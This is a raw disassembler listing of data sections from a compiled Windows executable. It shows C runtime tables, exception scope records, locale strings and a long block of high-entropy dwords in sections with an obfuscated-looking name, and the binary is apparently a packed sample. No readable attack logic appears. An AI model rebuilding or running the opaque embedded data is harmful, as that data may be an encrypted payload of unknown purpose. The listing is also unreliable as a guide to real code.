dword_421408 dd 0FFFFFFFEh, 0 ; DATA XREF: .kSjx934:00403F3A�o
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 4040FFh, 404103h, 0FFFFFFFEh, 4040C5h, 4040D9h
dword_421430 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4049A0+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404A38
align 10h
dword_421450 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_404C69+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_404DCA
align 10h
dword_421470 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4050B1+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40511B
align 10h
dword_421490 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405266+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405311
align 10h
dword_4214B0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4053B5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4054BE
dd 0FFFFFFFEh, 0
dd offset sub_4054CA
dword_4214D8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405934+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4059EE
align 8
dword_4214F8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407A0B+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset loc_407AC1
align 8
dword_421518 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407F55+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407FBC
align 8
dword_421538 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4084A1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4085BB
align 8
dword_421558 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4087E0+2�o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 408A09h, 408A0Dh, 0
dword_421578 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408AE1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408BA4
align 8
dword_421598 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408C7E+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_408D4F
dd 2 dup(0)
dd offset sub_408D1B
dword_4215C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A34F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A421
align 10h
dword_4215E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B29C+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B35C
align 10h
dd offset loc_40B31E
dd offset loc_40B328
dword_421608 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B3C2+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B405h, 40B40Eh, 40h, 2 dup(0)
dd offset sub_40B4E5
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 421624h
dword_421658 dd 19930522h, 2, 421634h, 1, 421644h, 3 dup(0)
; DATA XREF: .kSjx934:0041C1FF�o
dd 1, 0
dword_421680 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B4FD+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B61D
align 10h
dd offset loc_40B58D
dd offset loc_40B596
dword_4216A8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B699+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40B804h, 40B808h, 0
dword_4216C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B818+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B89Dh, 40B8A1h
dword_4216E4 dd 0 ; DATA XREF: sub_40BA07+162�o
dd offset sub_40B1CF
align 10h
dd offset dword_4216F4
dword_4216F4 dd 2, 421700h, 42195Ch, 0 ; DATA XREF: .kSjx934:004216F0�o
dd offset off_423E50
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 40BD5Dh, 0
dword_421720 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BE59+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BE79h, 40BE7Dh, 0
dword_421740 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BEA5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BEC9h, 40BECDh, 0
dword_421760 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CB14+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 40CB9Ah, 40CBB1h, 0
dword_421780 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CC52+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40CC98h, 40CCACh, 0
dword_4217A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CD41+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40CE50
align 10h
dword_4217C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D420+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40D4F2
align 10h
dword_4217E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D94F+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DA46
align 10h
dword_421800 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DA6D+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DBAB
align 10h
dword_421820 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DD29+2�o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DE97
align 10h
dword_421840 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DFD3+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E069
align 10h
dword_421860 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E6B0+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E749
align 10h
dword_421880 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EDEE+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40EE80
align 10h
dword_4218A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EEB0+2�o
dd 0FFFFFFC8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F046
dd 2 dup(0)
dd offset sub_40EF7D
dword_4218C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F04F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F126
align 8
dword_4218E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F789+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40F7A6h, 40F7C2h, 0
dword_421908 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4100DA+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 410107h, 410123h, 0
dd offset off_425918
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 4013CEh, 0
dd offset off_425938
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 4013E6h, 0
dd offset off_425958
align 8
dd 0FFFFFFFFh, 0
dword_421970 dd 0Ch, 402C72h, 3, 421924h, 421940h, 42195Ch, 0
; DATA XREF: .kSjx934:00421994�o
dd offset loc_4010E1
dd 0
dd offset dword_421970+8
dd 0
dd offset off_425974
dd 0
dd 0FFFFFFFFh, 0
dword_4219AC dd 0Ch, 401637h, 2, 421998h, 42195Ch, 0 ; DATA XREF: .kSjx934:004219CC�o
dd offset sub_401038
dd 0
dd offset dword_4219AC+8
dword_4219D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_419760+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 5 dup(0)
dd 0FFFFFFFFh, 41C26Ah
dword_421A00 dd 19930522h, 1, 4219F8h, 5 dup(0) ; DATA XREF: .kSjx934:0041C285�o
dd 1, 0FFFFFFFFh, 41C28Fh
dword_421A2C dd 19930522h, 1, 421A24h, 5 dup(0) ; DATA XREF: .kSjx934:0041C2AA�o
dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset sub_40150F
dd 40h, 2 dup(0)
dd offset loc_40149D
dd 2 dup(2), 3, 1, 421A70h, 2 dup(0)
dd 3, 1, 421A80h
dword_421AB8 dd 19930522h, 4, 421A50h, 2, 421A90h, 3 dup(0)
; DATA XREF: .kSjx934:0041C21A�o
dd 1, 0
dd 0FFFFFFFFh, 41C224h
dword_421AE8 dd 19930522h, 1, 421AE0h, 5 dup(0) ; DATA XREF: .kSjx934:0041C23D�o
dd 1, 0
dd 0FFFFFFFFh, 41C247h
dword_421B18 dd 19930522h, 1, 421B10h, 5 dup(0) ; DATA XREF: .kSjx934:0041C260�o
dd 1, 0
dd 0FFFFFFFFh, 41C2B4h
dword_421B48 dd 19930522h, 1, 421B40h, 5 dup(0) ; DATA XREF: .kSjx934:0041C2CD�o
dd 1, 0
dd 0FFFFFFFFh, 41C2D7h
dword_421B78 dd 19930522h, 1, 421B70h, 5 dup(0) ; DATA XREF: .kSjx934:0041C2FC�o
dd 1, 0
dd 0FFFFFFFFh, 41C306h
dword_421BA8 dd 19930522h, 1, 421BA0h, 5 dup(0) ; DATA XREF: .kSjx934:0041C331�o
dd 1, 0
dd 0FFFFFFFFh, 41C33Bh
dword_421BD8 dd 19930522h, 1, 421BD0h, 5 dup(0) ; DATA XREF: .kSjx934:0041C366�o
dd 1, 35D5A051h, 0C7C0F3C6h, 12CF5927h, 0A83D0345h, 56BBFC05h
dd 0C46AB159h, 0E41116D5h, 0E41B1B4Dh, 512CD20Ch, 0F1E223E2h
dd 7AE6E5EAh, 85491969h, 4B495A20h, 0BD4AACEBh, 0A3A4AA5Eh
dd 7145BD30h, 62B23C29h, 2E12EABAh, 482AF270h, 0AD532319h
dd 0EF1D9209h, 55D3E9BAh, 36B7DC4Ch, 0E361B2DAh, 2BBAD513h
dd 7E515168h, 5C4CD89Dh, 1C3B7A8Eh, 55FC91B0h, 0A38555A7h
dd 2ECDEDA9h, 98048687h, 719C317h, 13A91543h, 6BA32B91h
dd 0BDBFA53Ah, 1263660Ch, 0F05DA3Ah, 0A07428D6h, 2DA46F7Fh
dd 0F32F730Bh, 8469CCFh, 4C3E76B5h, 95658ECh, 4AC74EDCh
dd 57ADECC7h, 0C12B8944h, 0D6EFBFFCh, 83770474h, 2921C160h
dd 881F4E7Bh, 5E63D830h, 9E454562h, 0ED967812h, 526BE610h
dd 0E175A4F2h, 94F21035h, 0E762134Fh, 0A9E62F5Ch, 8AF146A4h
dd 577FF0FEh, 0B7B4B61Bh, 4CBAF9AEh, 0DCBCFD4Fh, 63E3A9A3h
dd 0C8D3A30Eh, 784F32F0h, 649B5BA9h, 0BA9E108h, 0A30A3A3Ah
dd 0A5EBAFB5h, 0DEFCDB7Bh, 96F36F44h, 0E57BB340h, 861D783h
dd 30BAB01Dh, 1233F44Eh, 6341934Ah, 0FA5475B1h, 0BDCBCBA5h
dd 417B98B7h, 2E5F9EA0h, 196E183Ah, 1B744680h, 3BA2987h
dd 0B132140Dh, 9D458A5Dh, 0A52EAAA1h, 0DDE89F34h, 71CEF684h
dd 84B14B23h, 536F1BF9h, 738EC933h, 0D12A04C8h, 7C8009D2h
dd 39BE0F1h, 575C709h, 0E42022D1h, 9345C1E0h, 7BF5346Bh
dd 7787404Bh, 35A87ABAh, 0E636D90Ch, 0AB25251Eh, 1A405ADBh
dd 0C58E03C2h, 9959867Ch, 0C01C7BB6h, 202582ECh, 7959A95Eh
dd 706EC64Bh, 0BF0AF5BCh, 0CC899939h, 601D6533h, 86059E85h
dd 763436DBh, 58664C10h, 8D1A5BFDh, 0B50BB6D0h, 742AFB9Ah
dd 6ACFB3DDh, 649ABCB3h, 5AB8E108h, 2067CBD1h, 22AABB15h
dd 226D9DF3h, 4B4AF47Fh, 1CE051FAh, 52AA8A89h, 53A4EE44h
dd 0A00481C4h, 6B8FF80h, 13772666h, 2196980Ch, 0DB660E2Bh
dd 1A37768Bh, 992B63F5h, 0BAB78600h, 6B23246Fh, 0A111519Ch
dd 0FF3D0A59h, 2FA1BF59h, 362CD3D6h, 0B84F2C70h, 10140DAh
dd 0D493D0EFh, 45C86CB8h, 11397C10h, 0AFA59B8Ah, 0F42C76BCh
dd 8BA6057Dh, 835C5EEFh, 3C23857Ah, 1F3D7C8Eh, 126DC033h
dd 1872437Eh, 2C3A6EC4h, 7AC628ECh, 3179D08Fh, 0C3EA64B1h
dd 0B15AB6FDh, 458F5D7Dh, 0C7D9CD36h, 93971AE8h, 27042076h
dd 598FA999h, 0DB2B132Fh, 0DA8ADD6Fh, 0C98EC5CEh, 0FB4A4CE6h
dd 0B0DE9F9Ah, 0EDDA1BDDh, 6BDB6A27h, 946B3A1Ah, 868713E5h
dd 0CD69E9D1h, 0C38C2D62h, 0FC80EAF8h, 7074580Ah, 0FCB05F9Ah
dd 3107A0DDh, 137492AEh, 5AAB7A68h, 0E7103764h, 0FA4F75A4h
dd 988FD4EBh, 575FD66Fh, 75BCBE1Fh, 3D740D3Ah, 22478693h
dd 3054C535h, 0B3A57457h, 0C42AEDADh, 0CE6F0F96h, 0C9FF35A2h
dd 58579895h, 5C67D23h, 0F054EA9Ch, 0E11D01D0h, 0CEC07A3Bh
dd 0C2B86B00h, 457C6606h, 70FEB089h, 763B80C1h, 2539288Ah
dd 0F1292954h, 0BC4B4CE4h, 9D3A7B0Dh, 5D277F54h, 8951204Dh
dd 7128523h, 845760Eh, 0FE6C4377h, 0BC8E60F6h, 0A0043D5Ah
dd 31ADFF80h, 0F9100965h, 3ECBCBA5h, 25C1693Ch, 50A3E2C1h
dd 8BD071FFh, 44CA9B46h, 0C703F0D1h, 7ECECCB5h, 0DEB7B08Eh
dd 1931FBC6h, 0E3A10B90h, 0A3F4B18Fh, 8CB27BA6h, 64270B18h
dd 0CCF96224h, 874EC22Eh, 0D32DCF2Eh, 0AE9F9D4Fh, 2715815Bh
dd 1D67997Eh, 77CF592Fh, 650CE591h, 0E95D96BDh, 0ABAA9FA2h
dd 0F6CFF15Eh, 0E960B4DBh, 0CDA29733h, 866264F2h, 4719756Ah
dd 0F6F031E9h, 7BEDADE9h, 208254BBh, 1F42D1C6h, 0DC8CA265h
dd 0D224A526h, 8424650Dh, 0C63AB4EDh, 3B9F179h, 0CFDAFDB8h
dd 781A7AF0h, 0F4FED0AFh, 330800CEh, 0A5656BE7h, 88D72694h
dd 0C621FB54h, 0EA2A2CD6h, 51DBC518h, 21418091h, 39878D77h
dd 0E40BDB9Eh, 0C57F94F9h, 445B8F09h, 0AA0AFE00h, 2C93C422h
dd 4E2EF3D7h, 78A3F1B8h, 3EE8DECFh, 123979F2h, 0B4F650CBh
dd 52CC02CFh, 4799CE29h, 0EFF2391Dh, 0E5E560B8h, 13232351h
dd 70D0471h, 863E72EBh, 97D39A49h, 52113414h, 538A8831h
dd 0FE449348h, 0B629B4EFh, 0CD06741Fh, 0A3BD9732h, 9B05D1DDh
dd 98D4DBD7h, 465FF6E6h, 0D9998A9Ch, 4DE310FDh, 558BE81Fh
dd 80B2C85Eh, 7AAFBAB6h, 93AECDE4h, 0D9EB8B2Fh, 0BDCFCD67h
dd 0C06A14DBh, 21AD1137h, 8B6F642Ch, 0B38AA649h, 0A3D23E39h
dd 42D05977h, 0A6F58F47h, 2518FAA1h, 0C8795A07h, 18EF401Eh
dd 0FB326460h, 3D5FDCEFh, 7F04093Eh, 0B5E7E7B3h, 0A9452707h
dd 4C9BDAC0h, 57ED07B2h, 0BFBD8F84h, 0F0D407AEh, 8FF0327Ah
dd 0E0DA3BD2h, 0AFA27F49h, 72ECDF36h, 30B895B0h, 0B357A5F8h
dd 1F3041D5h, 0E87D9A29h, 0CB67419Eh, 36B9DC10h, 1535B2DAh
dd 0A5E92BC2h, 0CA15154Ah, 29107431h, 0CF9EDF42h, 0CB890955h
dd 82471969h, 0D81C7D61h, 11F35341h, 23108F75h, 128BFFEBh
dd 0FAFDD0CEh, 92610481h, 66ED0E4Bh, 3563EEA2h, 0D39A8CD9h
dd 0BBA2984Ah, 0F812A2D3h, 0CE47C4E3h, 389CA6C0h, 94A9A994h
dd 0A2E5AA81h, 3365A4A5h, 7DA31A6Ch, 640ADE6Ch, 0E14A6AD9h
dd 3F4FCF63h, 24FABEFEh, 0D6FE4772h, 3ACC0BA5h, 25909236h
dd 439524FDh, 478DCCB9h, 365B40FEh, 0B2A77955h, 0A952A56Dh
dd 0EFB0CE2Dh, 35D23CEAh, 77517F92h, 0BF2DC383h, 0E6FCF26Bh
dd 76EF2E49h, 0BADCh, 38Dh dup(0)
_kSjx934 ends
; Section 3. (virtual address 00023000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00023000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_kSjx934 segment para public 'BSS' use32
assume cs:_kSjx934
;org 423000h
assume es:nothing, ss:nothing, ds:_kSjx934, fs:nothing, gs:nothing
dd offset dword_41D300
dd offset dword_41D300
off_423008 dd offset off_41D38C ; DATA XREF: .kSjx934:00420D94�o
; .kSjx934:00420DBC�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset dword_41D300
dd offset dword_41D300
off_423030 dd offset off_41D38C ; DATA XREF: .kSjx934:00420DF8�o
; .kSjx934:00420E18�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset dword_41D300
align 10h
dword_423050 dd 2 ; DATA XREF: sub_409AB4+42�r
; sub_409C54+19�r ...
align 10h
dd offset sub_40B11E
dword_423064 dd 0BB40E64Eh ; DATA XREF: sub_401C1D+9�r
; sub_401CC0+C�r ...
dword_423068 dd 44BF19B1h ; DATA XREF: sub_40468E+AE�r
; sub_40B08A+29�w ...
align 10h
dword_423070 dd 17h dup(0) ; DATA XREF: sub_4047C1+29�o
; sub_4049A0+63�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_423290 db 0 ; DATA XREF: sub_404C69+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 23h dup(0)
byte_423398 db 0 ; DATA XREF: sub_404C69+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
db 0
aAbcdefghijkl_0 db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
dd 21h dup(0)
off_423498 dd offset dword_423070 ; DATA XREF: sub_40271F+41�r
; sub_4049A0+4C�r ...
byte_42349C db 1 ; DATA XREF: sub_404ABE+E3�r
db 2, 4, 8
dword_4234A0 dd 3A4h ; DATA XREF: sub_404ABE:loc_404AFA�r
dword_4234A4 dd 82798260h ; DATA XREF: sub_404ABE+12B�r
dd 21h, 0
dword_4234B0 dd 0DFA6h ; DATA XREF: sub_404ABE+C6�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_41DF40+4
dword_423594 dd 0FFFFFFFEh ; DATA XREF: sub_40271F+2C�r
; sub_40271F+4C�r ...
dword_423598 dd 43h, 0 ; DATA XREF: sub_404E21:loc_404F1E�o
; sub_404F61:loc_404FAC�o ...
dword_4235A0 dd 1, 15h dup(0) ; DATA XREF: sub_405073+28�o
; sub_4053B5+DA�o ...
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_423F38
dd 2 dup(0)
off_423668 dd offset asc_41DD40 ; DATA XREF: sub_40F17F+D�r
; sub_40F1FC+D�r ...
; " ((((( H"
dd offset dword_41E148+80h
dd offset dword_41E148+200h
dd offset off_423E78
off_423678 dd offset dword_4235A0 ; DATA XREF: sub_40271F+24�r
; sub_4050B1+4E�r ...
dd 1
off_423680 dd offset dword_4235A0 ; DATA XREF: sub_40A9EB+17�o
dd offset dword_423070
dword_423688 dd 0FFFFFFFFh ; DATA XREF: sub_405127+13�r
; sub_405193+13�r ...
dword_42368C dd 0FFFFFFFFh ; DATA XREF: sub_405127+1�r
; sub_405127+1E�r ...
dword_423690 dd 1 ; DATA XREF: sub_405798:loc_40579E�r
dword_423694 dd 16h ; DATA XREF: sub_405798:loc_4057B9�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8 dd 0Ch ; DATA XREF: sub_4057D3+9�o
dword_4237FC dd 8 ; DATA XREF: sub_4057E6+9�o
dword_423800 dd 0 ; DATA XREF: sub_405881:loc_4058BE�w
; sub_4058CA+8�o ...
dword_423804 dd 1 ; DATA XREF: sub_405881:loc_40588A�r
dd 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 22h dup(0)
dword_423920 dd 10h ; DATA XREF: sub_4058CA+2A�o
; sub_4058CA+4A�o
off_423924 dd offset aNull_0 ; DATA XREF: sub_4069D7:loc_406EC5�r
; sub_4069D7+7E7�r
; "(null)"
off_423928 dd offset aNull ; DATA XREF: sub_4069D7+433�r
; "(null)"
align 10h
off_423930 dd offset sub_407AEA ; DATA XREF: sub_40785D+E�r
; sub_407B19+45�w
dd 3 dup(0)
dd offset dword_41D300
align 10h
off_423950 dd offset dword_433DC0 ; DATA XREF: sub_408084�o
; sub_40808A+52�o ...
align 8
dd offset dword_433DC0
dd 101h
dword_423960 dd 2 dup(0) ; DATA XREF: sub_40808A+74�o
dd 1000h, 4 dup(0)
dd 2, 1, 6 dup(0)
dd 2 dup(2), 7 dup(0)
dword_4239C0 dd 7Ch dup(0) ; DATA XREF: sub_40808A+A4�o
dword_423BB0 dd 8 dup(0) ; DATA XREF: sub_40815B+D�o
; sub_4081AD+D�o
dword_423BD0 dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA XREF: sub_4067D6:loc_4068DC�o
; sub_4069D7:loc_406AB3�o ...
dword_423C00 dd 2 ; DATA XREF: sub_409AB4:loc_409AC0�r
off_423C04 dd offset aR6002FloatingP ; DATA XREF: sub_409AB4:loc_409BE4�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41DA94h, 9, 41DA68h, 0Ah, 41D9D0h, 10h, 41D9A4h
dd 11h, 41D974h, 12h, 41D950h, 13h, 41D924h, 18h, 41D8ECh
dd 19h, 41D8C4h, 1Ah, 41D88Ch, 1Bh, 41D854h, 1Ch, 41D82Ch
dd 1Eh, 41D80Ch, 1Fh, 41D7A8h, 20h, 41D770h, 21h, 41D678h
dd 22h, 41D5D8h, 78h, 41D5C8h, 79h, 41D5B8h, 7Ah, 41D5A8h
dd 0FCh, 41D5A4h, 0FFh, 41D594h
byte_423CB8 db 0 ; DATA XREF: sub_409DAD:loc_40A10E�r
; sub_409DAD+36F�r
align 4
dd 2Fh dup(0)
dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2 dup(0)
dword_423DB8 dd 1B3Fh ; DATA XREF: sub_40A6EF+D�r
align 10h
dword_423DC0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_405266+1D�o
; sub_4053B5+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423E38 dd 3 ; DATA XREF: sub_40AA15+A1�r
; sub_40AA15+C0�r ...
dword_423E3C dd 7 ; DATA XREF: sub_40AA15+A7�r
; sub_40AA15+C6�r ...
dd 78h
dword_423E44 dd 0Ah ; DATA XREF: sub_40AA15+22�r
; sub_40DCE8+4�r
dd offset dword_41D300
dd offset sub_40B11E
off_423E50 dd offset off_41D38C ; DATA XREF: sub_40BA07+128�o
; .kSjx934:00420E40�o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
dd offset asc_41DD40 ; " ((((( H"
dd offset dword_41DF40+2
off_423E78 dd offset aSun ; DATA XREF: sub_404E21+D9�o
; .kSjx934:00423674�o ...
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_41E148+300h
dd 409h, 1, 0
dd offset off_423E78
dword_423F34 dd 2Eh ; DATA XREF: .kSjx934:off_423F38�o
off_423F38 dd offset dword_423F34 ; DATA XREF: sub_404E21+14�o
; sub_40C6C4+B�r ...
off_423F3C dd offset dword_426418 ; DATA XREF: sub_40C6C4+1D�r
off_423F40 dd offset dword_426418 ; DATA XREF: sub_40C6C4+2F�r
off_423F44 dd offset dword_426418 ; DATA XREF: sub_40C704+C�r
off_423F48 dd offset dword_426418 ; DATA XREF: sub_40C704+1E�r
off_423F4C dd offset dword_426418 ; DATA XREF: sub_40C704+30�r
off_423F50 dd offset dword_426418 ; DATA XREF: sub_40C704+42�r
off_423F54 dd offset dword_426418 ; DATA XREF: sub_40C704+54�r
off_423F58 dd offset dword_426418 ; DATA XREF: sub_40C704+66�r
off_423F5C dd offset dword_426418 ; DATA XREF: sub_40C704+78�r
dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80 dd offset sub_41059E ; DATA XREF: sub_40D59E:loc_40D5A2�r
; sub_40F70B+5�w
off_423F84 dd offset sub_41059E ; DATA XREF: sub_40F70B+A�w
off_423F88 dd offset sub_41059E ; DATA XREF: sub_40F70B+14�w
off_423F8C dd offset sub_41059E ; DATA XREF: sub_40F70B+1E�w
off_423F90 dd offset sub_41059E ; DATA XREF: sub_40F70B+28�w
off_423F94 dd offset sub_41059E ; DATA XREF: sub_40F70B+32�w
off_423F98 dd offset sub_41059E ; DATA XREF: sub_4069D7+61A�r
; sub_40F70B+37�w
off_423F9C dd offset sub_41059E ; DATA XREF: .kSjx934:00409458�r
; sub_40F70B+41�w
